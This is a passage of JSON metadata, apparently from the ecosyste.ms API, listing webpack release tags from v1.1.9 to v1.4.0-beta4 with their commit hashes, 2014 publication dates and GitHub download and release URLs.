bpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z",